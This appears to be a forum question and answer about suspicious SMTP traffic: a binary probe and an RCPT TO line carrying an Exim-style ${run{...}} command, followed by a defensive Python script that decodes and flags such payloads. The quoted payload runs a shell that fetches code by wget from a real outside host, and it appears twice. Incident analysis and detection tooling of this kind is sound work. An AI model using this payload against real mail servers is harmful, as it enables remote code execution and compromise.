I've noticed some strange activity from a remote host connected to our SMTP mail server. The queries contain non-ASCII characters; below is a copy of one of them (to each query our server responded with "command not implemented"):
..._)....pz4.H.T7.&...4..rШ./.+.... ..
The hex representation is:
20 00 00 00 5F 29 00 00 00 00 70 7A 34 00 48 00 54 37 00 26 00 00 00 34 00 00 72 D8 00 2F 00 2B 00 00 00 00 20 20 20 20 00 00
What is the goal of such queries? Is this some kind of security attack / searching for "back doors" or something?
Also, today I've noticed another strange SMTP command:
RCPT TO:<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f88.119.185.129\x22}}@mail.xsistema.lt>
EDIT 1:
This is the complete activity:
SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 220 mail.xsistema.lt ESMTPSA XMailServer v1.2.1 service ready
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: ���_)�ҫ��pz4�H�T7�&���4��rШ�/�+���� ��
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: /5�
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: S
PuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C:
&$�
PuTTYPuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
The hex representation:
SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 220 mail.xsistema.lt ESMTPSA XMailServer v1.2.1 service ready
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 20 00 00 00 5F 29 00 00 00 00 70 7A 34 00 48 00 54 37 00 26 00 00 00 34 00 00 72 D8 00 2F 00 2B 00 00 00 00 20 20 20 20 00 00
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 2F 35 00
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 53
PuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 24 00
SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
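Two things in the log are worth triaging separately: the opaque lines full of NULs, which cannot be SMTP commands at all (RFC 5321 commands are printable US-ASCII, which is why a text-protocol server answers 502), and the `RCPT TO` local part carrying an Exim-style `${run{...}}` string-expansion item whose argument is `\xHH`-escaped. The script below is an added example, not code from the question or from XMailServer: it decodes those escapes so the operator can read the command that would run on an MTA that expands the local part, and flags raw byte strings that are not SMTP text. The log lines in `SAMPLE_LOG` are constructed in the question's own format (the first `RCPT TO` is the payload quoted above; the other two lines are made up), and `BINARY_PROBE` is the hex listed in the question.

```python
"""Triage for the two kinds of traffic in the question: a binary blob sent as
an SMTP command line, and an Exim-style ${run{...}} expansion payload in the
local part of RCPT TO.  Added example, not code from the question; the log
format copies the XMailServer lines above and the SAMPLE_LOG entries are
constructed (the first RCPT TO is the payload quoted in the question)."""
import re
from typing import Dict, List, Optional

# The first unidentified "command", exactly the bytes listed in the question.
BINARY_PROBE = bytes.fromhex(
    "20 00 00 00 5F 29 00 00 00 00 70 7A 34 00 48 00 54 37 00 26 00 00 00 34 "
    "00 00 72 D8 00 2F 00 2B 00 00 00 00 20 20 20 20 00 00"
)

# Constructed log lines in the question's own format.
SAMPLE_LOG = [
    "SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: RCPT TO:"
    "<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x20199.204.214.40\\x2fsbz"
    "\\x2f88.119.185.129\\x22}}@mail.xsistema.lt>",
    "SMTP PID=4 Date=2019-07-10,22:31:12 IP=203.0.113.9:51000 C: RCPT TO:"
    "<alice@mail.xsistema.lt>",
    "SMTP PID=4 Date=2019-07-10,22:31:13 IP=203.0.113.9:51000 C: DATA",
]

_RCPT_RE = re.compile(r"RCPT TO:<([^>]*)>", re.IGNORECASE)
# Escapes accepted inside Exim string expansions: \xHH plus \t \n \r \\ .
_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr\\])")
# ${name{argument}} : the expansion item and its argument.
_EXPANSION_RE = re.compile(r"\$\{(\w+)\{(.*)\}\}", re.DOTALL)


def is_binary_command(data: bytes) -> bool:
    """True if the line cannot be an SMTP command at all.

    RFC 5321 commands are printable US-ASCII terminated by CRLF; NULs, other
    control bytes and anything >= 0x80 mean a non-SMTP probe or junk."""
    return any(
        not (0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D)) for b in data
    )


def unescape_exim(s: str) -> str:
    """Decode the \\xHH and \\t style escapes used in the RCPT TO payload."""
    simple = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}

    def repl(m: "re.Match[str]") -> str:
        if m.group(1):
            return chr(int(m.group(1), 16))
        return simple[m.group(2)]

    return _ESCAPE_RE.sub(repl, s)


def detect_rcpt_expansion(line: str) -> Optional[Dict[str, str]]:
    """Return details if the RCPT TO local part carries a ${...{...}} item.

    A legitimate local part never contains '${'; when one does, the decoded
    argument is what would run if the receiving MTA expanded it."""
    m = _RCPT_RE.search(line)
    if not m:
        return None
    local_part, _, domain = m.group(1).rpartition("@")
    exp = _EXPANSION_RE.search(local_part)
    if not exp:
        return None
    return {
        "domain": domain,
        "expansion": exp.group(1),  # e.g. "run"
        "command": unescape_exim(exp.group(2)),
    }


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run the RCPT TO check over a list of log lines."""
    findings = []
    for line in lines:
        hit = detect_rcpt_expansion(line)
        if hit is not None:
            hit["line"] = line
            findings.append(hit)
    return findings


if __name__ == "__main__":
    print("binary probe is non-SMTP:", is_binary_command(BINARY_PROBE))
    for f in scan_log(SAMPLE_LOG):
        print(f"${{{f['expansion']}{{...}}}} in RCPT TO for {f['domain']}:")
        print("   ", repr(f["command"]))
```

Run stand-alone it reports the first blob as non-SMTP and prints the decoded argument of the `${run{...}}` item, `/bin/sh -c "wget 199.204.214.40/sbz/88.119.185.129"` with tabs between the words, which is the only part of the question's log that names a remote host and path worth blocking and checking against your own outbound traffic. The decoder only shows what the local part would expand to; whether anything runs depends on the receiving MTA honouring that syntax, and XMailServer answered the other lines with 502 rather than executing anything.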